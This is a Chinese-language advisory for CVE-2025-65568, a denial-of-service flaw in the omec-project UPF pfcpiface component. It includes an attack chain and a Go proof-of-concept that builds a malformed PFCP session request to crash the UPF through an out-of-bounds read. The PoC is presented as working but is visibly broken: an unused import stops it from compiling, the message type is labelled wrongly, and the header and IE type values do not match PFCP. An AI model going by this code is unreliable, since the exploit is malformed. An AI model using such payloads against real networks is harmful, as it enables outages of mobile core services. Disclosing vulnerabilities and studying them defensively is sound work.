CVE-2025-65568: omec-project UPF pfcpiface 拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-65568

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

omec-project UPF (pfcpiface component), upf-epc-pfcpiface:2.1.3-dev

漏洞概述

CVE-2025-65568是omec-project开源项目UPF（User Plane Function，用户面功能）中pfcpiface组件的一个高危拒绝服务漏洞。该漏洞影响upf-epc-pfcpiface 2.1.3-dev版本。漏洞源于PFCP（Packet Forwarding Control Protocol）会话建立请求处理过程中，对CreateFAR（创建转发动作规则）中的IPv4地址字段缺乏有效验证。当攻击者发送包含空或截断IPv4地址字段的PFCP会话建立请求时，系统在解析过程中调用ip2int()函数会对IPv4地址缓冲区执行越界读取操作，触发索引越界panic，导致UPF服务崩溃。由于该漏洞可通过网络远程利用且无需认证，攻击者可以反复发送恶意请求使UPF反复崩溃，持续中断用户平面服务，影响5G核心网的正常运行。

技术细节

该漏洞位于omec-project UPF项目的pfcpiface组件中，具体位于PFCP会话建立请求的解析逻辑。在PFCP协议中，CreateFAR IE（Information Element）用于创建转发动作规则，其中可能包含IPv4地址字段。漏洞代码流程如下：1) UPF接收PFCP Session Establishment Request；2) 调用parseFAR()函数解析CreateFAR IE；3) parseFAR()调用ip2int()函数将IPv4地址字符串转换为整数；4) ip2int()函数在处理空或截断的IPv4地址时，未进行边界检查，直接对缓冲区执行读取操作；5) 导致越界读取，触发Go语言的index out of range panic异常。由于pfcpiface使用Go语言编写，数组越界访问会触发运行时panic，使整个进程崩溃。攻击者只需构造特定的PFCP消息，设置CreateFAR IE中IPv4地址字段为空或长度不足，即可稳定触发该漏洞。

攻击链分析

STEP 1

1

攻击者发现目标UPF的N4/PFCP接口暴露在公网或内网中

STEP 2

2

攻击者与UPF建立PFCP关联（PFCP Association），完成协议握手

STEP 3

3

攻击者构造恶意的PFCP Session Establishment Request消息，在CreateFAR IE中包含空或截断的IPv4地址字段

STEP 4

4

UPF的pfcpiface组件接收到恶意请求，调用parseFAR()函数解析CreateFAR IE

STEP 5

5

parseFAR()调用ip2int()函数处理IPv4地址，由于地址字段为空或截断，触发缓冲区越界读取

STEP 6

6

Go运行时检测到数组越界访问，触发index out of range panic，UPF进程崩溃

STEP 7

7

攻击者反复发送恶意请求，造成UPF反复崩溃，持续中断用户平面服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

package main

import (
    "bytes"
    "encoding/binary"
    "fmt"
    "net"
)

// PFCP IE Types
const (
    IE_CreateFAR          = 0x0200
    IE_ApplyAction        = 0x0400
    IE_ForwardingParameters = 0x0500
    IE_DestinationInterface = 0x0600
    IE_FTEID              = 0x0100
)

// Build PFCP Session Establishment Request with malformed CreateFAR
func buildMalformedPFCPMessage() []byte {
    var buf bytes.Buffer
    
    // PFCP Header
    buf.WriteByte(0x20) // Version=1, MP=0, Flags=0
    buf.WriteByte(0x01) // Message Type: Session Establishment Request
    
    // Sequence Number (3 bytes) + spare
    binary.Write(&buf, binary.BigEndian, uint32(0x000001))
    
    // Message Length (placeholder)
    msgLen := uint16(0)
    lenPos := buf.Len()
    binary.Write(&buf, binary.BigEndian, msgLen)
    
    // IE: Create FAR with truncated IPv4 address
    // IE Type
    binary.Write(&buf, binary.BigEndian, uint16(IE_CreateFAR))
    
    // IE Length (will be set later)
    ieDataStart := buf.Len()
    binary.Write(&buf, binary.BigEndian, uint16(0))
    
    // Truncated IPv4 address field (empty or incomplete)
    // This triggers the out-of-bounds read in ip2int()
    truncatedIP := []byte{0x00} // Empty or incomplete IP address
    buf.Write(truncatedIP)
    
    // Set IE Length
    ieLen := uint16(buf.Len() - ieDataStart - 2)
    binary.BigEndian.PutUint16(buf.Bytes()[ieDataStart:], ieLen)
    
    // Update message length
    msgLen = uint16(buf.Len() - 4)
    binary.BigEndian.PutUint16(buf.Bytes()[lenPos:], msgLen)
    
    return buf.Bytes()
}

func main() {
    fmt.Println("CVE-2025-65568 PoC - Malformed PFCP Session Establishment Request")
    
    // Target UPF N4/PFCP endpoint
    targetAddr := "192.168.1.100:8805"
    
    // Build malicious PFCP message
    payload := buildMalformedPFCPMessage()
    
    // Send to UPF (requires PFCP association to be established first)
    // This PoC demonstrates the message structure
    // Attacker needs to establish PFCP association before sending session requests
    fmt.Printf("Target: %s\n", targetAddr)
    fmt.Printf("Payload length: %d bytes\n", len(payload))
    fmt.Printf("Payload hex: %x\n", payload)
    fmt.Println("\nNote: Establish PFCP association first, then send this malformed session request")
    
    // Connection attempt (commented out for safety)
    // conn, err := net.Dial("udp", targetAddr)
    // if err != nil {
    //     fmt.Printf("Connection error: %v\n", err)
    //     return
    // }
    // defer conn.Close()
    // conn.Write(payload)
}

影响范围

upf-epc-pfcpiface:2.1.3-dev

防御指南

临时缓解措施

在网络层面对PFCP流量进行访问控制，限制只有授权网元才能访问UPF的N4接口；使用防火墙规则过滤异常的PFCP消息；部署入侵检测系统（IDS）监控PFCP流量，检测潜在的拒绝服务攻击尝试。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-65568
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-65568
3 Details https://www.cvedetails.com/cve/CVE-2025-65568/
4 VulDB https://vuldb.com/cve/CVE-2025-65568
5 Link http://omec-projectupf.com
6 Link http://upf-epc-pfcpiface.com
7 Link https://github.com/omec-project/upf/issues/962
8 Link https://github.com/omec-project/upf/issues/962